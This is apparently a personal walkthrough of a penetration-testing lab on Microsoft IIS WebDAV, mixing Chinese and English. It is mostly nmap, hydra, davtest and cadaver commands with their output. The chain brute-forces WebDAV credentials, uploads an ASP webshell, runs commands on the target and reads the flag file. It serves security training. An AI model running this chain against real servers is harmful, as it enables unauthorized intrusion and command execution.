Exploiting Microsoft IIS WebDAV(利用 Microsoft IIS WebDAV)
Microsoft IIS
IIS(Internet 信息服务)是 Microsoft 为与 Windows NT 系列一起使用而开发的专有可扩展 Web 服务器软件。
它可用于托管网站/Web 应用程序,并为管理员提供强大的 GUI 来管理网站。
IIS 可用于托管以 ASP.NET 和 PHP 开发的静态和动态网页。
通常配置为在端口 80/443 上运行。
支持的可执行文件扩展名:
.asp.aspx.config.php
WebDAV
WebDAV(基于 Web 的分布式创作和版本控制)是 HTTP 协议的一组扩展,允许用户协作编辑和管理远程 Web 服务器上的文件。
WebDAV 本质上使 Web 服务器能够充当文件服务器以进行协作创作。
WebDAV 在端口 80/443 上的顶级 Microsoft IIS 上运行。
为了连接到 WebDAV 服务器,您需要提供合法的凭据。 这是因为 WebDAV 以用户名和密码的形式实现身份验证。
WebDAV 利用
利用过程的第一步将涉及识别 WebDAV 是否已配置为在 IIS Web 服务器上运行。
我们可以对 WebDAV 服务器执行暴力攻击,以识别可用于身份验证的合法凭据。
获得合法凭据后,我们可以通过 WebDAV 服务器进行身份验证,并上传恶意 .asp 有效负载,该负载可用于执行任意命令或在目标上获取反向 shell。
工具
Davtest - 用于扫描、验证和利用 WebDAV 服务器。
Cadaver - cadaver 支持文件上传、下载、屏幕显示、就地编辑、命名空间操作(移动/复制)、集合创建和删除、属性操作和 WebDAV 服务器上的资源锁定。
video
1
Target IP Address: 10.2.17.124
-sV: Perform service version detection.
-sC: Perform script scan, using the default nmap scrpt.
1
nmap -sV -sC 10.2.17.124
http-enum: That is essentially tell us where have the webdav directory and wether webdav is configured on the web server.
1
nmap -sV -p 80 --script=http-enum 10.2.17.124
输入目标IP地址,重定向到
1
10.2.17.124/Default.aspx
访问/webdav/目录,需要进行HTTP身份验证。
1
10.2.17.124/webdav/
/webdav/: The directory that contains the authorization form.
1
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt 10.2.17.124 http-get /webdav/
在Authentication Required窗口中输入以下用户名和密码:
1
2
Username: bob
Password: password_123321
webdav is a protocol that allow us to essentially upload, download files from this directory as well as modify and delete file within this directory. We can do this through use various tools, we are going to start with devtest.
davtest
DAVTest 通过上传测试可执行文件,然后(可选)上传允许直接在目标上执行命令或其他操作的文件来测试启用了 WebDAV 的服务器。它旨在让渗透测试人员快速轻松地确定启用的 DAV 服务是否可利用。
1
davtest
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@kali:~# davtest -h
^^^^^^^^^^^^^^ 错误 ^^^^^^^^^^^^^^
/usr/bin/davtest -url <url> [选项]
-auth+ 授权(用户:密码)
-cleanup 完成后删除所有上传的内容
-directory+ 要创建的目录的后缀部分
-debug+ DAV 调试级别 1-3 (2 & 3 log req/resp to /tmp/perldav_debug.txt)
-move PUT 文本文件,然后移动到可执行文件
-nocreate 不创建目录
-quiet 只打印摘要
-rand+ 使用它而不是文件名的随机字符串
-sendbd+ 发送后门:
auto - 对于任何成功的测试
ext - 后门/目录中匹配文件名的扩展名
-uploadfile+ 上传这个文件(需要 -uploadloc)
-uploadloc+ 将文件上传到此位置/名称(需要 -uploadfile)
-url+ DAV 位置的 url
示例:/usr/bin/davtest -url http://localhost/davdir
Check wether webdav has been configured on the web server. Authenticate with webdav.
1
davtest -url http://10.2.17.124/webdav
1
davtest -auth bob:password_123321 -url http://10.2.17.124/webdav
It does serious check. What type of file can be upload, what type of file can be executed on the webdav server.
We can generate a asp payload, we can utilize an asp webshell to obtain some form of command execution on the target or perform some, execute asp file here.
We can utilize cadavar to upload asp shell.
1
2
cadaver
dav:!>
cadaver 支持文件上传、下载、屏幕显示、就地编辑、命名空间操作(移动/复制)、集合创建和删除、属性操作和资源锁定。
它的操作类似于标准的 BSD ftp(1) 客户端和 Samba 项目的 smbclient(1)。
此软件包包括 GnuTLS (HTTPS) 支持。
WebDAV(基于 Web 的分布式创作和版本控制)是 HTTP 协议的一组扩展,允许用户协作编辑和管理远程 Web 服务器上的文件。
1
cadaver --help
用于 Unix 的命令行 WebDAV 客户端。
1
2
3
4
5
6
7
8
9
10
root@kali:~# cadaver -h
用法:cadaver [OPTIONS] http://hostname[:port]/path
端口默认为 80,路径默认为 '/'
选项:
-t,--allow 允许 cd/open 进入未启用 WebDAV 的集合。
-r, --rcfile=FILE 从 FILE 而不是 ~/.cadaverrc 中读取脚本。
-p, --proxy=PROXY[:PORT] 使用代理主机 PROXY 和可选的代理端口 PORT。
-V, --version 显示版本信息。
-h, --help 显示此帮助消息。
请将错误报告和功能请求发送至 <cadaver@webdav.org>
1
2
3
cadaver http://10.2.17.124/webdav
dav:/webdav/> ls
We can upload a webshell in order to obtain some forms of command execution on the target system. In order to do that, we open a new tab here. Kali Linux prepackage with serious webshell, they can be access under the:
1
2
ls -al /usr/share/webshells/
asp/ aspx/ cfm/ jsp/ laudanum/ perl/ php/ seclists/
Only asp file can be executed:
1
2
ls -al /usr/share/webshells/asp/
cmd-asp-5.1.asp cmdasp.asp webshell.asp
Upload webshell.asp to webdav directory.
hit back to cadaver.
1
dav:/webdav/> put /usr/share/webshells/asp/webshell.asp
back in browser, refresh the listing of webdav directory:
1
10.2.17.124/webdav
We can launch the webshell by clicking on it, this will provide you an input box. It allows you to perform command execution, and allows you to perform commands on the target system. The output of these commands will be output in this page.
1
10.2.17.124/webdav/webshell.asp
Because the target is Windows system, we can launch:
1
2
3
4
whoami
ipconfig
dir C:\
type C:\flag.txt
Windows:IIS 服务器 DAVTest
概述
为您提供了 Kali GUI 机器和易受攻击的目标机器。目标机器的 IP 地址在 Kali 机器桌面 (/root/Desktop/target) 上名为 target 的文本文件中提供。
你的任务是使用 Kali 机器上可用的工具对服务进行指纹识别,并使用 Davtest 和 Cadaver 工具进行攻击。
Davtest:
- Davtest 是一个WebDAV 扫描器,它将漏洞利用文件发送到WebDAV 服务器并自动创建目录并上传不同格式类型的文件。该工具还尝试执行上传的文件,并为我们提供成功执行文件的输出。
cadaver:
- Cadaver 是一种用于WebDAV 客户端的工具,它支持命令行风格的界面。支持上传文件、编辑、移动等操作。
目标:利用服务并检索标志!
以下用户名和密码可用于访问服务:
| 用户名 | 密码 |
|---|---|
| bob | password_123321 |
说明:
- 你的 Kali 机器有一个 IP 地址为 10.10.X.Y 的接口。运行“ip addr”来知道X和Y的值。
- 目标机器的IP地址在文件“/root/Desktop/target”中提到
- 不要攻击位于IP地址192.V.W.1的网关和10.10.X.1
我自己的思路
1
Target IP Address : 10.0.24.74
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@attackdefense:~# nmap -sV 10.0.24.74
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-04 08:13 IST
Nmap scan report for 10.0.24.74
Host is up (0.0041s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql MySQL (unauthorized)
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.02 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
root@attackdefense:~# nmap -sV -sC 10.0.24.74
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-04 08:17 IST
Nmap scan report for 10.0.24.74
Host is up (0.0037s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND LOCK UNLOCK PROPPATCH MKCOL PUT DELETE MOVE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to /Default.aspx
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, LOCK, UNLOCK
| Server Type: Microsoft-IIS/10.0
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|_ Server Date: Sun, 04 Sep 2022 02:48:05 GMT
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql MySQL (unauthorized)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: DOTNETGOAT
| NetBIOS_Domain_Name: DOTNETGOAT
| NetBIOS_Computer_Name: DOTNETGOAT
| DNS_Domain_Name: DotNetGoat
| DNS_Computer_Name: DotNetGoat
| Product_Version: 10.0.17763
|_ System_Time: 2022-09-04T02:48:06+00:00
| ssl-cert: Subject: commonName=DotNetGoat
| Not valid before: 2022-09-03T02:42:17
|_Not valid after: 2023-03-05T02:42:17
|_ssl-date: 2022-09-04T02:48:13+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-09-04T02:48:08
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.67 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@attackdefense:~# nmap -sV -p 80 --script=http-enum 10.0.24.74
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-04 08:28 IST
Nmap scan report for 10.0.24.74
Host is up (0.0036s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-enum:
|_ /webdav/: Potentially interesting folder (401 Unauthorized)
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.33 seconds
输入目标IP地址,重定向到:
1
http://10.0.24.74/Default.aspx
访问/webdav/目录,需要进行HTTP身份验证:
1
10.2.17.124/webdav/
/webdav/: 包含认证表单的目录。
1
2
3
4
root@attackdefense:~# ls /usr/share/wordlists/metasploit/
common_passwords.txt
common_users.txt
1
2
3
4
5
6
7
8
9
root@attackdefense:~# hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt 10.0.24.74 http-get /webdav/
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-04 08:40:19
[DATA] max 16 tasks per 1 server, overall 16 tasks, 400 login tries (l:8/p:50), ~25 tries per task
[DATA] attacking http-get://10.0.24.74:80/webdav/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-04 08:40:22
在Authentication Required窗口中输入以下用户名和密码:
1
bob:password_123321
webdav 是一个协议,它允许我们从这个目录上传、下载文件以及修改和删除这个目录中的文件。 我们可以通过使用各种工具来做到这一点,我们将从 devtest 开始。
DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.
检查是否已在 Web 服务器上配置了 webdav。 使用 webdav 进行身份验证。
1
2
3
4
5
root@attackdefense:~# davtest -url http://10.0.24.74/webdav/
********************************************************
Testing DAV connection
OPEN FAIL: http://10.0.24.74/webdav Unauthorized. Basic realm="10.0.24.74"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
root@attackdefense:~# davtest -auth bob:password_123321 -url http://10.0.24.74/webdav/
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.0.24.74/webdav
********************************************************
NOTE Random string for this session: YZdrheF_F_5VrQ
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ
********************************************************
Sending test files
PUT pl SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.pl
PUT shtml SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.shtml
PUT cfm SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.cfm
PUT jsp SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.jsp
PUT cgi SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.cgi
PUT aspx SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.aspx
PUT jhtml SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.jhtml
PUT html SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.html
PUT asp SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.asp
PUT txt SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.txt
PUT php SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.php
********************************************************
Checking for test file execution
EXEC pl FAIL
EXEC shtml FAIL
EXEC cfm FAIL
EXEC jsp FAIL
EXEC cgi FAIL
EXEC aspx FAIL
EXEC jhtml FAIL
EXEC html SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.html
EXEC asp SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.asp
EXEC txt SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.txt
EXEC php FAIL
********************************************************
/usr/bin/davtest Summary:
Created: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.pl
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.shtml
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.cfm
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.jsp
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.cgi
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.aspx
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.jhtml
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.html
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.asp
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.txt
PUT File: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.php
Executes: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.html
Executes: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.asp
Executes: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.txt
有三个测试文件执行了,因此,我们可以上传asp的webshell。
1
2
3
4
5
Checking for test file execution
EXEC html SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.html
EXEC asp SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.asp
EXEC txt SUCCEED: http://10.0.24.74/webdav/DavTestDir_YZdrheF_F_5VrQ/davtest_YZdrheF_F_5VrQ.txt
cadaver supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking.
Its operation is similar to the standard BSD ftp(1) client and the Samba Project’s smbclient(1).
This package includes GnuTLS (HTTPS) support.
WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allow users to collaboratively edit and manage files on remote web servers.
我们可以上传一个 webshell,以便在目标系统上获得某种形式的命令执行。 为此,我们在此处打开一个新选项卡。 Kali Linux prepackage webshell,它们可以在以下位置访问:
因为实验室重启了,所以目标IP变了:
1
Target IP Address : 10.0.28.114
1
2
3
4
root@attackdefense:~# ls /usr/share/webshells/
asp aspx cfm jsp laudanum perl php seclists
root@attackdefense:~# ls /usr/share/webshells/asp
cmd-asp-5.1.asp cmdasp.asp webshell.asp
上传aps的webshell:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@attackdefense:~# cadaver http://10.0.28.114/webdav/
Authentication required for 10.0.28.114 on server `10.0.28.114':
Username: bob
Password:
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
AttackDefense.txt 13 Jan 2 2021
web.config 168 Jan 2 2021
dav:/webdav/> help
Available commands:
ls cd pwd put get mget mput
edit less mkcol cat delete rmcol copy
move lock unlock discover steal showlocks version
checkin checkout uncheckout history label propnames chexec
propget propdel propset search set open close
echo quit unset lcd lls lpwd logout
help describe about
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/webdav/> put /usr/share/webshells/asp/webshell.asp
Uploading /usr/share/webshells/asp/webshell.asp to `/webdav/webshell.asp':
Progress: [=============================>] 100.0% of 1362 bytes succeeded.
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
AttackDefense.txt 13 Jan 2 2021
web.config 168 Jan 2 2021
webshell.asp 1362 Sep 4 09:27
访问上传的asp webshell:
1
http://10.0.28.114/webdav/webshell.asp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
\\DOTNETGOAT\bob10.0.28.114
The server's port:
80
The server's software:
Microsoft-IIS/10.0
The server's local address:
10.0.28.114
执行命令:
1
2
3
whoami
iis apppool\defaultapppool
1
2
3
4
5
6
7
8
9
10
11
12
13
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : ap-southeast-1.compute.internal
Link-local IPv6 Address . . . . . : fe80::20e5:378b:e470:2dad%4
IPv4 Address. . . . . . . . . . . : 10.0.28.114
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 10.0.16.1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
dir C:\
Volume in drive C has no label.
Volume Serial Number is 9E32-0E96
Directory of C:\
11/14/2018 06:56 AM
EFI
01/02/2021 01:01 PM 32 flag.txt
10/27/2020 06:45 AM
inetpub
05/13/2020 05:58 PM
PerfLogs
10/27/2020 02:18 PM
Program Files
10/27/2020 02:18 PM
Program Files (x86)
10/27/2020 02:21 PM
Users
10/27/2020 06:46 AM
Windows
1 File(s) 32 bytes
7 Dir(s) 16,243,744,768 bytes free
1
2
3
type C:\flag.txt
0cc175b9c0f1b6a831c399e269772661
解决方案
此实验室的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-2317.pdf
